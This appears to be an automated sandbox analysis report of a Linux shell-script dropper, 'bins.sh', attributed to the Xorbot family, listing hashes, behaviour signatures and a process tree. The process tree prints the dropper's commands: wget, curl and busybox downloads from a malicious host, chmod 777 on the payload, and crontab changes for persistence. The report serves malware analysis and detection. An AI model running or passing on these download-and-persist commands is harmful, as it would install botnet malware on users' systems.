Analysis
-
max time kernel
149s -
max time network
149s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/02/2025, 07:26
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
4cfb0882602e49bb3bb56c54e08029a6
-
SHA1
d60467677204a5e3045c01dca1ff688264ab69b9
-
SHA256
199cd72604764bd453856e029830cce18d0f746a1caae617cbafebda9d785617
-
SHA512
d9a9c852ca4823533dab2b557a096e4055d3665ce8f562b2d0612029ecba77d391811af06e53e55e4fb483589d1009ab948faf0590252578a3f9a143d5c14aef
-
SSDEEP
192:0BBSrBsKwWxWlWYW/W3WB9GurAMMsG253Xy5bz2R95PvExdDPvExdrV3X0bz2R9L:0BBSrBsKwWxWlWYW/W3WB6sG285bz2RF
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot -
Xorbot family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1509 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb 1510 bins.sh -
Renames itself 1 IoCs
pid Process 1511 bins.sh -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.Nh9UKQ crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/7/cmdline bins.sh File opened for reading /proc/81/cmdline bins.sh File opened for reading /proc/989/cmdline bins.sh File opened for reading /proc/1155/cmdline bins.sh File opened for reading /proc/12/cmdline bins.sh File opened for reading /proc/13/cmdline bins.sh File opened for reading /proc/176/cmdline bins.sh File opened for reading /proc/406/cmdline bins.sh File opened for reading /proc/758/cmdline bins.sh File opened for reading /proc/984/cmdline bins.sh File opened for reading /proc/34/cmdline bins.sh File opened for reading /proc/162/cmdline bins.sh File opened for reading /proc/179/cmdline bins.sh File opened for reading /proc/1226/cmdline bins.sh File opened for reading /proc/1497/cmdline bins.sh File opened for reading /proc/25/cmdline bins.sh File opened for reading /proc/79/cmdline bins.sh File opened for reading /proc/171/cmdline bins.sh File opened for reading /proc/174/cmdline bins.sh File opened for reading /proc/477/cmdline bins.sh File opened for reading /proc/687/cmdline bins.sh File opened for reading /proc/161/cmdline bins.sh File opened for reading /proc/665/cmdline bins.sh File opened for reading /proc/1054/cmdline bins.sh File opened for reading /proc/1115/cmdline bins.sh File opened for reading /proc/1312/cmdline bins.sh File opened for reading /proc/1520/cmdline bins.sh File opened for reading /proc/166/cmdline bins.sh File opened for reading /proc/430/cmdline bins.sh File opened for reading /proc/471/cmdline bins.sh File opened for reading /proc/651/cmdline bins.sh File opened for reading /proc/1293/cmdline bins.sh File opened for reading /proc/26/cmdline bins.sh File opened for reading /proc/30/cmdline bins.sh File opened for reading /proc/1078/cmdline bins.sh File opened for reading /proc/1339/cmdline bins.sh File opened for reading /proc/4/cmdline bins.sh File opened for reading /proc/450/cmdline bins.sh File opened for reading /proc/459/cmdline bins.sh File opened for reading /proc/165/cmdline bins.sh File opened for reading /proc/316/cmdline bins.sh File opened for reading /proc/1068/cmdline bins.sh File opened for reading /proc/1190/cmdline bins.sh File opened for reading /proc/1472/cmdline bins.sh File opened for reading /proc/28/cmdline bins.sh File opened for reading /proc/29/cmdline bins.sh File opened for reading /proc/35/cmdline bins.sh File opened for reading /proc/78/cmdline bins.sh File opened for reading /proc/424/cmdline bins.sh File opened for reading /proc/1021/cmdline bins.sh File opened for reading /proc/1286/cmdline bins.sh File opened for reading /proc/1324/cmdline bins.sh File opened for reading /proc/3/cmdline bins.sh File opened for reading /proc/19/cmdline bins.sh File opened for reading /proc/515/cmdline bins.sh File opened for reading /proc/1140/cmdline bins.sh File opened for reading /proc/1164/cmdline bins.sh File opened for reading /proc/168/cmdline bins.sh File opened for reading /proc/415/cmdline bins.sh File opened for reading /proc/432/cmdline bins.sh File opened for reading /proc/1146/cmdline bins.sh File opened for reading /proc/1254/cmdline bins.sh File opened for reading /proc/1499/cmdline bins.sh File opened for reading /proc/1/cmdline bins.sh -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1508 busybox 1520 wget 1502 wget 1506 curl -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb wget File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb curl File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1499 -
/bin/rm/bin/rm bins.sh2⤵PID:1501
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1502
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1508
-
-
/bin/chmodchmod 777 rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- File and Directory Permissions Modification
PID:1509
-
-
/usr/bin/crontabcrontab -l2⤵PID:1513
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1515
-
-
/bin/rmrm rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵PID:1517
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL2⤵
- System Network Configuration Discovery
PID:1520
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
210B
MD59e46f0d9bbb1d05fa0595ba01101e50d
SHA15483b61331391ab199530dff2514fdd6b3bec944
SHA256f00fbe556f5009f634279ffe07494cbfb9e1f1decf04a47dfd880f6d2db7f123
SHA51233ce795a80bdfe104d3704d30af47529e3b342aa20a2363db949a1143179d73b506555d0e7b02ac1d3234b83dd471c6b49e90e7cee5cebef1fe49d0e971427af